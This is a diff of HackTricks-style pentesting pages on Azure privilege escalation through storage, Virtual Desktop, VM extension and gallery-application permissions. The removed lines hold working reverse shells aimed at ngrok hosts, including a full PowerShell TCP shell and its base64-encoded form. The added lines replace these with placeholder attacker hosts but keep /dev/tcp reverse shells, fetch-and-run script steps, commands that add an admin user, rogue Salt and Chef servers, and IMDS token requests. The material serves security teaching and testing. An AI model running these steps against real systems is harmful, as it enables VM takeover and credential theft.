-With this permissions an attacker can restore a deleted container by specifying its deleted version ID or undelete specific blobs within a container, if they were previously soft-deleted. This privilege escalation could allow an attacker to recover sensitive data that was meant to be permanently deleted, potentially leading to unauthorized access.
+This management-plane action initiates a point-in-time restore for specified lexicographic ranges of blobs and a requested timestamp. It is distinct from restoring an individual soft-deleted container or blob.<sup>[[1]](#references)[[9]](#references)</sup>
+
+### Soft-deleted containers and blobs via account keys
+
+A principal that obtains an account key through `Microsoft.Storage/storageAccounts/listKeys/action` can use Shared Key authorization for the data-plane commands below when Shared Key is enabled. `Microsoft.Storage/storageAccounts/read` exposes account properties, and `Microsoft.Storage/storageAccounts/blobServices/containers/read` can enumerate containers, but neither read action is the same as `restoreBlobRanges/action`. A container can be restored only when container soft delete is enabled and the deleted version remains within its retention period; a blob can likewise be undeleted only within the configured blob-retention period.<sup>[[1]](#references)[[2]](#references)[[10]](#references)[[11]](#references)</sup>
 
 ```bash
 #Restore the soft deleted container
 az storage container restore \
   --account-name <STORAGE_ACCOUNT_NAME> \
+  --account-key <ACCOUNT_KEY> \
   --name <CONTAINER_NAME> \
   --deleted-version <VERSION>
 
 #Restore the soft deleted blob
 az storage blob undelete \
   --account-name <STORAGE_ACCOUNT_NAME> \
+  --account-key <ACCOUNT_KEY> \
   --container-name <CONTAINER_NAME> \
   --name "fileName.txt"
 ```
 
 ### `Microsoft.Storage/storageAccounts/fileServices/shares/restore/action` && `Microsoft.Storage/storageAccounts/read`
 
-With these permissions, an attacker can restore a deleted Azure file share by specifying its deleted version ID. This privilege escalation could allow an attacker to recover sensitive data that was meant to be permanently deleted, potentially leading to unauthorized access.
+The restore action permits recovery of a deleted Azure file share by its deleted-version identifier while share soft delete is enabled and the share remains within the retention period; the accompanying read action exposes the storage account's properties. Recovering a share may expose data that users believed had been deleted.<sup>[[1]](#references)[[12]](#references)</sup>
 
 ```bash
 az storage share-rm restore \
@@ -139,17 +157,24 @@ az storage share-rm restore \
 
 ## Other interesting looking permissions (TODO)
 
-- Microsoft.Storage/storageAccounts/blobServices/containers/blobs/manageOwnership/action: Changes ownership of the blob
-- Microsoft.Storage/storageAccounts/blobServices/containers/blobs/modifyPermissions/action: Modifies permissions of the blob
-- Microsoft.Storage/storageAccounts/blobServices/containers/blobs/runAsSuperUser/action: Returns the result of the blob command
-- Microsoft.Storage/storageAccounts/blobServices/containers/blobs/immutableStorage/runAsSuperUser/action
+- Microsoft.Storage/storageAccounts/blobServices/containers/blobs/manageOwnership/action: Changes ownership of the blob.<sup>[[1]](#references)</sup>
+- Microsoft.Storage/storageAccounts/blobServices/containers/blobs/modifyPermissions/action: Modifies permissions of the blob.<sup>[[1]](#references)</sup>
+- Microsoft.Storage/storageAccounts/blobServices/containers/blobs/runAsSuperUser/action: Returns the result of the blob command.<sup>[[1]](#references)</sup>
+- Microsoft.Storage/storageAccounts/blobServices/containers/blobs/immutableStorage/runAsSuperUser/action.<sup>[[1]](#references)</sup>
 
 ## References
 
-- [https://learn.microsoft.com/en-us/azure/role-based-access-control/permissions/storage#microsoftstorage](https://learn.microsoft.com/en-us/azure/role-based-access-control/permissions/storage#microsoftstorage)
-- [https://learn.microsoft.com/en-us/azure/storage/blobs/secure-file-transfer-protocol-support](https://learn.microsoft.com/en-us/azure/storage/blobs/secure-file-transfer-protocol-support)
+- [1] [Azure permissions for Storage](https://learn.microsoft.com/en-us/azure/role-based-access-control/permissions/storage#microsoftstorage)
+- [2] [Prevent Shared Key authorization for an Azure Storage account](https://learn.microsoft.com/en-us/azure/storage/common/shared-key-authorization-prevent)
+- [3] [Storage Accounts - Regenerate Key](https://learn.microsoft.com/en-us/rest/api/storagerp/storage-accounts/regenerate-key?view=rest-storagerp-2025-08-01)
+- [4] [Set the default public network access rule](https://learn.microsoft.com/en-us/azure/storage/common/storage-network-security-set-default-access)
+- [5] [Configure immutability policies for containers](https://learn.microsoft.com/en-us/azure/storage/blobs/immutable-policy-configure-container-scope)
+- [6] [az storage account local-user](https://learn.microsoft.com/en-us/cli/azure/storage/account/local-user?view=azure-cli-latest)
+- [7] [SFTP support for Azure Blob Storage](https://learn.microsoft.com/en-us/azure/storage/blobs/secure-file-transfer-protocol-support)
+- [8] [Connect to Azure Blob Storage from an SFTP client](https://learn.microsoft.com/en-us/azure/storage/blobs/secure-file-transfer-protocol-support-connect)
+- [9] [Storage Accounts - Restore Blob Ranges](https://learn.microsoft.com/en-us/rest/api/storagerp/storage-accounts/restore-blob-ranges?view=rest-storagerp-2026-04-01)
+- [10] [Manage blob containers using Azure CLI](https://learn.microsoft.com/en-us/azure/storage/blobs/blob-containers-cli)
+- [11] [az storage blob](https://learn.microsoft.com/en-us/cli/azure/storage/blob?view=azure-cli-latest)
+- [12] [az storage share-rm](https://learn.microsoft.com/en-us/cli/azure/storage/share-rm?view=azure-cli-latest)
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-

--- a/src/pentesting-cloud/azure-security/az-privilege-escalation/az-virtual-desktop-privesc.md
+++ b/src/pentesting-cloud/azure-security/az-privilege-escalation/az-virtual-desktop-privesc.md
@@ -1,6 +1,4 @@
-# Az - Virtual Desktop Privesx
-
-{{#include ../../../banners/hacktricks-training.md}}
+# Az - Virtual Desktop Privesc
 
 ## Azure Virtual Desktop Privesc
 
@@ -12,10 +10,13 @@ For more info about Azure Virtual Desktop check:
 
 
 ### `Microsoft.DesktopVirtualization/hostPools/retrieveRegistrationToken/action`
-You can retrieve the registration token used to register virtual machines within an host pool.
+
+This permission lets you retrieve a host pool's registration token. The Azure Virtual Desktop agent supplies this token when a session-host VM is first registered with the service.<sup>[[1]](#references)[[2]](#references)</sup>
 
 ```bash
-az desktopvirtualization hostpool retrieve-registration-token -n testhostpool -g Resource_Group_1
+az desktopvirtualization hostpool retrieve-registration-token \
+  --name <host-pool-name> \
+  --resource-group <resource-group>
 ```
 
 ### Microsoft.Authorization/roleAssignments/read, Microsoft.Authorization/roleAssignments/write
@@ -23,7 +24,7 @@ az desktopvirtualization hostpool retrieve-registration-token -n testhostpool -g
 > [!WARNING]
 > An attacker with these permissions could do things much more dangerous than this one.
 
-With this permissions you can add a user assignment to the Application group, which is needed to access the virtual machine of the virtual desktop:
+With these permissions, you can create a role assignment scoped to the application group and grant a principal the **Desktop Virtualization User** role. Azure Virtual Desktop uses this role to publish an application group to users or groups, and its built-in role ID is `1d18fff3-a72a-46b5-b4a9-0b38a3cd7e63`.<sup>[[3]](#references)[[4]](#references)[[5]](#references)</sup>
 
 ```bash
 az rest --method PUT \
@@ -36,8 +37,15 @@ az rest --method PUT \
   }'
 ```
 
-Note that in order for a user to be able to access a Desktop or an app, he also needs the role `Virtual Machine User Login` or `Virtual Machine Administrator Login` over the VM.
+For Microsoft Entra joined session hosts that aren't managed by a session host configuration, the assigned user also needs `Virtual Machine User Login`, or `Virtual Machine Administrator Login` for local administrator access, at the VM, resource-group, or subscription scope. This extra assignment isn't required for host pools that use a session host configuration.<sup>[[6]](#references)</sup>
 
+## References
+
+- [1] [az desktopvirtualization hostpool - Azure CLI](https://learn.microsoft.com/en-us/cli/azure/desktopvirtualization/hostpool?view=azure-cli-latest)
+- [2] [Troubleshoot Azure Virtual Desktop session host](https://learn.microsoft.com/en-us/troubleshoot/azure/virtual-desktop/troubleshoot-vm-configuration)
+- [3] [Delegated access in Azure Virtual Desktop](https://learn.microsoft.com/en-us/azure/virtual-desktop/delegated-access-virtual-desktop)
+- [4] [Built-in Azure RBAC roles for Azure Virtual Desktop](https://learn.microsoft.com/en-us/azure/virtual-desktop/rbac)
+- [5] [Role Assignments - Create By Id - REST API](https://learn.microsoft.com/en-us/rest/api/authorization/role-assignments/create-by-id?view=rest-authorization-2022-04-01)
+- [6] [Microsoft Entra joined session hosts in Azure Virtual Desktop](https://learn.microsoft.com/en-us/azure/virtual-desktop/azure-ad-joined-session-hosts)
 
 {{#include ../../../banners/hacktricks-training.md}}
-

--- a/src/pentesting-cloud/azure-security/az-privilege-escalation/az-virtual-machines-and-network-privesc.md
+++ b/src/pentesting-cloud/azure-security/az-privilege-escalation/az-virtual-machines-and-network-privesc.md
@@ -1,7 +1,5 @@
 # Az - Virtual Machines & Network Privesc
 
-{{#include ../../../banners/hacktricks-training.md}}
-
 ## VMS & Network
 
 For more info about Azure Virtual Machines and Network check:
@@ -12,18 +10,17 @@ For more info about Azure Virtual Machines and Network check:
 
 ### **`Microsoft.Compute/virtualMachines/extensions/write`**
 
-This permission allows to execute extensions in virtual machines which allow to **execute arbitrary code on them**.\
-Example abusing custom extensions to execute arbitrary commands in a VM:
+This permission allows VM extensions to be deployed or updated. Because the Custom Script extensions for Linux and Windows run supplied commands or scripts inside the guest, extension write access can be abused to execute arbitrary code on a VM. For example:<sup>[[1]](#references)[[2]](#references)[[3]](#references)[[14]](#references)</sup>
 
 {{#tabs }}
 {{#tab name="Linux" }}
 
-- Execute a revers shell
+- Execute a reverse shell
 
 ```bash
 # Prepare the rev shell
-echo -n 'bash -i  >& /dev/tcp/2.tcp.eu.ngrok.io/13215 0>&1' | base64
-YmFzaCAtaSAgPiYgL2Rldi90Y3AvMi50Y3AuZXUubmdyb2suaW8vMTMyMTUgMD4mMQ==
+echo -n 'bash -i >& /dev/tcp/<attacker-host>/<port> 0>&1' | base64
+# Copy the output as <base64-payload>.
 
 # Execute rev shell
 az vm extension set \
@@ -33,20 +30,20 @@ az vm extension set \
   --publisher Microsoft.Azure.Extensions \
   --version 2.1 \
   --settings '{}' \
-  --protected-settings '{"commandToExecute": "nohup echo YmFzaCAtaSAgPiYgL2Rldi90Y3AvMi50Y3AuZXUubmdyb2suaW8vMTMyMTUgMD4mMQ== | base64 -d | bash &"}'
+  --protected-settings '{"commandToExecute": "nohup echo <base64-payload> | base64 -d | bash &"}'
 ```
 
 - Execute a script located on the internet
 
 ```bash
 az vm extension set \
-  --resource-group rsc-group> \
+  --resource-group <rsc-group> \
   --vm-name <vm-name> \
   --name CustomScript \
   --publisher Microsoft.Azure.Extensions \
   --version 2.1 \
-  --settings '{"fileUris": ["https://gist.githubusercontent.com/carlospolop/8ce279967be0855cc13aa2601402fed3/raw/72816c3603243cf2839a7c4283e43ef4b6048263/hacktricks_touch.sh"]}' \
-  --protected-settings '{"commandToExecute": "sh hacktricks_touch.sh"}'
+  --settings '{"fileUris": ["https://<attacker-host>/<script-name>.sh"]}' \
+  --protected-settings '{"commandToExecute": "sh <script-name>.sh"}'
 ```
 
 {{#endtab }}
@@ -56,8 +53,8 @@ az vm extension set \
 - Execute a reverse shell
 
 ```bash
-# Get encoded reverse shell
-echo -n '$client = New-Object System.Net.Sockets.TCPClient("7.tcp.eu.ngrok.io",19159);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()' | iconv --to-code UTF-16LE | base64
+# Encode the authorized PowerShell payload as UTF-16LE Base64.
+printf '%s' '<powershell-command>' | iconv --to-code UTF-16LE | base64
 
 # Execute it
 az vm extension set \
@@ -67,7 +64,7 @@ az vm extension set \
   --publisher Microsoft.Compute \
   --version 1.10 \
   --settings '{}' \
-  --protected-settings '{"commandToExecute": "powershell.exe -EncodedCommand JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIANwAuAHQAYwBwAC4AZQB1AC4AbgBnAHIAbwBrAC4AaQBvACIALAAxADkAMQA1ADkAKQA7ACQAcwB0AHIAZQBhAG0AIAA9ACAAJABjAGwAaQBlAG4AdAAuAEcAZQB0AFMAdAByAGUAYQBtACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAkAGIAeQB0AGUAcwAgAD0AIAAwAC4ALgA2ADUANQAzADUAfAAlAHsAMAB9ADsAdwBoAGkAbABlACgAKAAkAGkAIAA9ACAAJABzAHQAcgBlAGEAbQAuAFIAZQBhAGQAKAAkAGIAeQB0AGUAcwAsACAAMAAsACAAJABiAHkAdABlAHMALgBMAGUAbgBnAHQAaAApACkAIAAtAG4AZQAgADAAKQB7ADsAJABkAGEAdABhACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AVAB5AHAAZQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AQQBTAEMASQBJAEUAbgBjAG8AZABpAG4AZwApAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGIAeQB0AGUAcwAsADAALAAgACQAaQApADsAJABzAGUAbgBkAGIAYQBjAGsAIAA9ACAAKABpAGUAeAAgACQAZABhAHQAYQAgADIAPgAmADEAIAB8ACAATwB1AHQALQBTAHQAcgBpAG4AZwAgACkAOwAkAHMAZQBuAGQAYgBhAGMAawAyACAAIAA9ACAAJABzAGUAbgBkAGIAYQBjAGsAIAArACAAIgBQAFMAIAAiACAAKwAgACgAcAB3AGQAKQAuAFAAYQB0AGgAIAArACAAIgA+ACAAIgA7ACQAcwBlAG4AZABiAHkAdABlACAAPQAgACgAWwB0AGUAeAB0AC4AZQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQApAC4ARwBlAHQAQgB5AHQAZQBzACgAJABzAGUAbgBkAGIAYQBjAGsAMgApADsAJABzAHQAcgBlAGEAbQAuAFcAcgBpAHQAZQAoACQAcwBlAG4AZABiAHkAdABlACwAMAAsACQAcwBlAG4AZABiAHkAdABlAC4ATABlAG4AZwB0AGgAKQA7ACQAcwB0AHIAZQBhAG0ALgBGAGwAdQBzAGgAKAApAH0AOwAkAGMAbABpAGUAbgB0AC4AQwBsAG8AcwBlACgAKQA="}'
+  --protected-settings '{"commandToExecute": "powershell.exe -EncodedCommand <encoded-command>"}'
 
 ```
 
@@ -80,19 +77,11 @@ az vm extension set \
   --name CustomScriptExtension \
   --publisher Microsoft.Compute \
   --version 1.10 \
-  --settings '{"fileUris": ["https://gist.githubusercontent.com/carlospolop/33b6d1a80421694e85d96b2a63fd1924/raw/d0ef31f62aaafaabfa6235291e3e931e20b0fc6f/ps1_rev_shell.ps1"]}' \
-  --protected-settings '{"commandToExecute": "powershell.exe -ExecutionPolicy Bypass -File ps1_rev_shell.ps1"}'
+  --settings '{"fileUris": ["https://<attacker-host>/<script-name>.ps1"]}' \
+  --protected-settings '{"commandToExecute": "powershell.exe -ExecutionPolicy Bypass -File <script-name>.ps1"}'
 ```
 
-You could also execute other payloads like: `powershell net users new_user Welcome2022. /add /Y; net localgroup administrators new_user /add`
-
-- Reset password using the VMAccess extension
-
-```bash
-# Run VMAccess extension to reset the password
-$cred=Get-Credential # Username and password to reset (if it doesn't exist it'll be created). "Administrator" username is allowed to change the password
-Set-AzVMAccessExtension -ResourceGroupName "<rsc-group>" -VMName "<vm-name>" -Name "myVMAccess" -Credential $cred
-```
+You could also execute other payloads like: `powershell net users <NEW_USERNAME> <NEW_PASSWORD> /add /Y; net localgroup administrators <NEW_USERNAME> /add`
 
 {{#endtab }}
 {{#endtabs }}
@@ -100,7 +89,7 @@ Set-AzVMAccessExtension -ResourceGroupName "<rsc-group>" -VMName "<vm-name>" -Na
 
 #### Rogue Salt Master via Salt Minion
 
-A less noisy alternative is to deploy a **legitimate third-party extension** and make the VM call back to attacker infrastructure. The Salt Minion extension (`turtletraction.oss/salt-minion.linux` or `turtletraction.oss/salt-minion.windows`) installs a minion that initiates **outbound** connections to the configured master over **TCP 4505/4506**, so the attacker doesn't need SSH, RDP, local credentials, or inbound access to the VM. After the minion key is accepted on the rogue master, the master can push states or directly execute commands. In Linux VMs this commonly results in **root** command execution.
+A less noisy alternative is to deploy a **legitimate third-party extension** and make the VM call back to attacker infrastructure. The Salt Minion extension (`turtletraction.oss/salt-minion.linux` or `turtletraction.oss/salt-minion.windows`) installs a minion that initiates **outbound** connections to the configured master over **TCP 4505/4506**, so the attacker doesn't need SSH, RDP, local credentials, or inbound access to the VM. After the minion key is accepted on the rogue master, the master can push states or directly execute commands. On Linux, those commands run as **root**.<sup>[[6]](#references)[[7]](#references)</sup>
 
 {{#tabs }}
 {{#tab name="Linux" }}
@@ -137,7 +126,7 @@ az vm extension set \
 {{#endtab }}
 {{#endtabs }}
 
-Once the minion checks in, accept its key from the rogue master and push a state or a direct command:
+Once the minion checks in, accept its key from the rogue master and push a state or a direct command.<sup>[[7]](#references)</sup>
 
 ```bash
 salt-key -L
@@ -146,7 +135,7 @@ salt 'azvm' state.apply <state-name>
 salt 'azvm' cmd.run 'whoami && id'
 ```
 
-Because the command runs **inside** the guest, this is also a convenient path to steal tokens from attached managed identities through IMDS:
+Because the command runs **inside** the guest, this is also a convenient path to request tokens for attached managed identities through IMDS.<sup>[[7]](#references)[[11]](#references)</sup>
 
 ```bash
 salt 'azvm' cmd.run 'curl -s -H "Metadata: true" --noproxy "*" "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/"'
@@ -158,9 +147,9 @@ It's also possible to abuse well-known extensions to execute code or perform pri
 
 <summary>VMAccess extension</summary>
 
-This extension allows to modify the password (or create if it doesn't exist) of users inside Windows VMs.
+This extension can reset or create a Windows VM user and grants administrator privileges to the specified account.<sup>[[4]](#references)[[18]](#references)</sup>
 
-```bash
+```powershell
 # Run VMAccess extension to reset the password
 $cred=Get-Credential # Username and password to reset (if it doesn't exist it'll be created). "Administrator" username is allowed to change the password
 Set-AzVMAccessExtension -ResourceGroupName "<rsc-group>" -VMName "<vm-name>" -Name "myVMAccess" -Credential $cred
@@ -172,9 +161,9 @@ Set-AzVMAccessExtension -ResourceGroupName "<rsc-group>" -VMName "<vm-name>" -Na
 
 <summary>DesiredConfigurationState (DSC)</summary>
 
-This is a **VM extensio**n that belongs to Microsoft that uses PowerShell DSC to manage the configuration of Azure Windows VMs. Therefore, it can be used to **execute arbitrary commands** in Windows VMs through this extension:
+This Microsoft **VM extension** uses PowerShell DSC to enact supplied configurations on Azure Windows VMs. A configuration containing a DSC `Script` resource can therefore be used to execute arbitrary commands in the guest.<sup>[[5]](#references)</sup>
 
-```bash
+```powershell
 # Content of revShell.ps1
 Configuration RevShellConfig {
     Node localhost {
@@ -226,9 +215,11 @@ Set-AzVMDscExtension `
 
 <summary>Chef Client / LinuxChefClient (third-party marketplace extension)</summary>
 
-Third-party marketplace extensions can also be abused if the extension configuration lets you **point the guest agent to an attacker-controlled policy server**. With Chef, an identity that can write VM extensions can deploy `ChefClient` (Windows) or `LinuxChefClient` (Linux) from publisher `Chef.Bootstrap.WindowsAzure`, set `bootstrap_options.chef_server_url` to a rogue Chef server, and choose an attacker-controlled `runlist`. The VM Agent installs the extension, Chef pulls the cookbook, and the recipe `execute` resource runs arbitrary commands inside the guest.
+Third-party marketplace extensions can also be abused if the extension configuration lets you **point the guest agent to an attacker-controlled policy server**. With Chef, an identity that can write VM extensions can deploy `ChefClient` (Windows) or `LinuxChefClient` (Linux) from publisher `Chef.Bootstrap.WindowsAzure`, set `bootstrap_options.chef_server_url` to a rogue Chef server, and choose an attacker-controlled `runlist`. The VM Agent installs the extension, Chef pulls the cookbook, and the recipe `execute` resource runs arbitrary commands inside the guest.<sup>[[8]](#references)[[10]](#references)</sup>
 
-A minimal malicious recipe is enough to turn the convergence run into command execution:
+A lightweight Chef Zero instance is one option for the rogue policy server.<sup>[[9]](#references)[[10]](#references)</sup>
+
+A minimal malicious recipe is enough to turn the convergence run into command execution.<sup>[[10]](#references)</sup>
 
 ```ruby
 execute 'payload' do
@@ -237,7 +228,7 @@ execute 'payload' do
 end
 ```
 
-Then deploy the extension and point it to the rogue Chef server (swap `LinuxChefClient` for `ChefClient` on Windows):
+Then deploy the extension and point it to the rogue Chef server (swap `LinuxChefClient` for `ChefClient` on Windows).<sup>[[8]](#references)[[10]](#references)</sup>
 
 ```json
 {
@@ -262,9 +253,9 @@ az vm extension set \
   --protected-settings @protected.json
 ```
 
-Where `protected.json` must contain the Chef validation private key (for example the `validation_key` field), and `settings.json` contains the JSON shown previously. `chef_server_url` and `runlist` are the key attacker-controlled fields, and the target VM must be able to reach the rogue Chef server. A common follow-up is stealing the VM managed identity token from IMDS and using it against ARM.
+Where `protected.json` must contain the Chef validation private key (for example the `validation_key` field), and `settings.json` contains the JSON shown previously. `chef_server_url` and `runlist` are the key attacker-controlled fields, and the target VM must be able to reach the rogue Chef server. A common follow-up is requesting the VM managed identity token from IMDS and using it against ARM.<sup>[[8]](#references)[[10]](#references)[[11]](#references)</sup>
 
-Useful investigation artifacts:
+NetSPI identifies these useful investigation artifacts:<sup>[[10]](#references)</sup>
 
 - Linux: `/var/lib/waagent/Chef.Bootstrap.WindowsAzure.LinuxChefClient-<version>/config/0.settings`, `/var/log/azure/Chef.Bootstrap.WindowsAzure.LinuxChefClient/chef-client.log`, `/var/log/waagent.log`
 - Windows: `C:\chef\0.settings`, `C:\WindowsAzure\Logs\Plugins\Chef.Bootstrap.WindowsAzure.ChefClient\<version>\chef-client.log`, `C:\WindowsAzure\Logs\WaAppAgent.log`
@@ -276,15 +267,13 @@ Useful investigation artifacts:
 
 <summary>Hybrid Runbook Worker</summary>
 
-This is a VM extension that would allow to execute runbooks in VMs from an automation account. For more information check the [Automation Accounts service](../az-services/az-automation-account/index.html).
+This extension registers a VM as a Hybrid Runbook Worker so an Automation Account can execute runbooks on it. For more information, see the [Automation Accounts service](../az-services/az-automation-accounts.md).<sup>[[20]](#references)</sup>
 
 </details>
 
-### `Microsoft.Compute/disks/write, Microsoft.Network/networkInterfaces/join/action, Microsoft.Compute/virtualMachines/write, (Microsoft.Compute/galleries/applications/write, Microsoft.Compute/galleries/applications/versions/write)`
+### `Microsoft.Compute/galleries/write`, `Microsoft.Compute/galleries/applications/write`, `Microsoft.Compute/galleries/applications/versions/write`, `Microsoft.Compute/virtualMachines/write`
 
-These are the required permissions to **create a new gallery application and execute it inside a VM**. Gallery applications can execute anything so an attacker could abuse this to compromise VM instances executing arbitrary commands.
-
-The last 2 permissions might be avoided by sharing the application with the tenant.
+The gallery permissions allow an attacker to create a VM Application definition and version; `Microsoft.Compute/virtualMachines/write` allows that version to be added to an existing VM. Azure executes the install command stored in the application version, so control of those fields can become guest command execution. A pre-existing gallery or application reduces the operations needed for that particular path.<sup>[[12]](#references)[[14]](#references)</sup>
 
 Exploitation example to execute arbitrary commands:
 
@@ -292,42 +281,42 @@ Exploitation example to execute arbitrary commands:
 {{#tab name="Linux" }}
 
 ```bash
-# Create gallery (if the isn't any)
-az sig create --resource-group myResourceGroup \
-   --gallery-name myGallery --location "West US 2"
+# Create a gallery if one is not already available
+az sig create --resource-group <rsc-group> \
+   --gallery-name <gallery-name> --location <location>
 
 # Create application container
 az sig gallery-application create \
     --application-name myReverseShellApp \
-    --gallery-name myGallery \
+    --gallery-name <gallery-name> \
     --resource-group <rsc-group> \
     --os-type Linux \
-    --location "West US 2"
+    --location <location>
 
 # Create app version with the rev shell
-## In Package file link just add any link to a blobl storage file
+# The package URL must point to a package that the VM can download.
 az sig gallery-application version create \
    --version-name 1.0.2 \
    --application-name myReverseShellApp \
-   --gallery-name myGallery \
-   --location "West US 2" \
+   --gallery-name <gallery-name> \
+   --location <location> \
    --resource-group <rsc-group> \
-   --package-file-link "https://testing13242erih.blob.core.windows.net/testing-container/asd.txt?sp=r&st=2024-12-04T01:10:42Z&se=2024-12-04T09:10:42Z&spr=https&sv=2022-11-02&sr=b&sig=eMQFqvCj4XLLPdHvnyqgF%2B1xqdzN8m7oVtyOOkMsCEY%3D" \
-   --install-command "bash -c 'bash -i >& /dev/tcp/7.tcp.eu.ngrok.io/19159 0>&1'" \
-   --remove-command "bash -c 'bash -i >& /dev/tcp/7.tcp.eu.ngrok.io/19159 0>&1'" \
-   --update-command "bash -c 'bash -i >& /dev/tcp/7.tcp.eu.ngrok.io/19159 0>&1'"
+   --package-file-link "https://<storage-account>.blob.core.windows.net/<container>/<package>?<sas-token>" \
+   --install-command "bash -c 'bash -i >& /dev/tcp/<attacker-host>/<port> 0>&1'" \
+   --remove-command "true" \
+   --update-command "true"
 
 # Install the app in a VM to execute the rev shell
 ## Use the ID given in the previous output
 az vm application set \
    --resource-group <rsc-group> \
    --name <vm-name> \
-   --app-version-ids /subscriptions/9291ff6e-6afb-430e-82a4-6f04b2d05c7f/resourceGroups/Resource_Group_1/providers/Microsoft.Compute/galleries/myGallery/applications/myReverseShellApp/versions/1.0.2 \
+   --app-version-ids /subscriptions/<subscription-id>/resourceGroups/<rsc-group>/providers/Microsoft.Compute/galleries/<gallery-name>/applications/myReverseShellApp/versions/1.0.2 \
    --treat-deployment-as-failure true
 
 
 # You can create a SAS URL from a blob with something like:
-export EXPIRY=$(date -u -v +1d '+%Y-%m-%dT%H:%MZ')
+export EXPIRY=$(date -u -d '+1 day' '+%Y-%m-%dT%H:%MZ' 2>/dev/null || date -u -v+1d '+%Y-%m-%dT%H:%MZ')
 export URL_PACKAGE=$(az storage blob generate-sas \
   --account-name <acc-name> \
   --container-name <container-name> \
@@ -344,45 +333,44 @@ export URL_PACKAGE=$(az storage blob generate-sas \
 {{#tab name="Windows" }}
 
 ```bash
-# Create gallery (if the isn't any)
+# Create a gallery if one is not already available
 az sig create --resource-group <rsc-group> \
-   --gallery-name myGallery --location "West US 2"
+   --gallery-name <gallery-name> --location <location>
 
 # Create application container
 az sig gallery-application create \
     --application-name myReverseShellAppWin \
-    --gallery-name myGallery \
+    --gallery-name <gallery-name> \
     --resource-group <rsc-group> \
     --os-type Windows \
-    --location "West US 2"
+    --location <location>
 
-# Get encoded reverse shell
-echo -n '$client = New-Object System.Net.Sockets.TCPClient("7.tcp.eu.ngrok.io",19159);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()' | iconv --to-code UTF-16LE | base64
+# Encode an authorized PowerShell payload as UTF-16LE Base64.
 
 # Create app version with the rev shell
-## In Package file link just add any link to a blobl storage file
-export encodedCommand="JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIANwAuAHQAYwBwAC4AZQB1AC4AbgBnAHIAbwBrAC4AaQBvACIALAAxADkAMQA1ADkAKQA7ACQAcwB0AHIAZQBhAG0AIAA9ACAAJABjAGwAaQBlAG4AdAAuAEcAZQB0AFMAdAByAGUAYQBtACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAkAGIAeQB0AGUAcwAgAD0AIAAwAC4ALgA2ADUANQAzADUAfAAlAHsAMAB9ADsAdwBoAGkAbABlACgAKAAkAGkAIAA9ACAAJABzAHQAcgBlAGEAbQAuAFIAZQBhAGQAKAAkAGIAeQB0AGUAcwAsACAAMAAsACAAJABiAHkAdABlAHMALgBMAGUAbgBnAHQAaAApACkAIAAtAG4AZQAgADAAKQB7ADsAJABkAGEAdABhACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AVAB5AHAAZQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AQQBTAEMASQBJAEUAbgBjAG8AZABpAG4AZwApAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGIAeQB0AGUAcwAsADAALAAgACQAaQApADsAJABzAGUAbgBkAGIAYQBjAGsAIAA9ACAAKABpAGUAeAAgACQAZABhAHQAYQAgADIAPgAmADEAIAB8ACAATwB1AHQALQBTAHQAcgBpAG4AZwAgACkAOwAkAHMAZQBuAGQAYgBhAGMAawAyACAAIAA9ACAAJABzAGUAbgBkAGIAYQBjAGsAIAArACAAIgBQAFMAIAAiACAAKwAgACgAcAB3AGQAKQAuAFAAYQB0AGgAIAArACAAIgA+ACAAIgA7ACQAcwBlAG4AZABiAHkAdABlACAAPQAgACgAWwB0AGUAeAB0AC4AZQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQApAC4ARwBlAHQAQgB5AHQAZQBzACgAJABzAGUAbgBkAGIAYQBjAGsAMgApADsAJABzAHQAcgBlAGEAbQAuAFcAcgBpAHQAZQAoACQAcwBlAG4AZABiAHkAdABlACwAMAAsACQAcwBlAG4AZABiAHkAdABlAC4ATABlAG4AZwB0AGgAKQA7ACQAcwB0AHIAZQBhAG0ALgBGAGwAdQBzAGgAKAApAH0AOwAkAGMAbABpAGUAbgB0AC4AQwBsAG8AcwBlACgAKQA="
+# The package URL must point to a package that the VM can download.
+export encodedCommand="<base64-encoded-powershell>"
 az sig gallery-application version create \
    --version-name 1.0.0 \
    --application-name myReverseShellAppWin \
-   --gallery-name myGallery \
-   --location "West US 2" \
+   --gallery-name <gallery-name> \
+   --location <location> \
    --resource-group <rsc-group> \
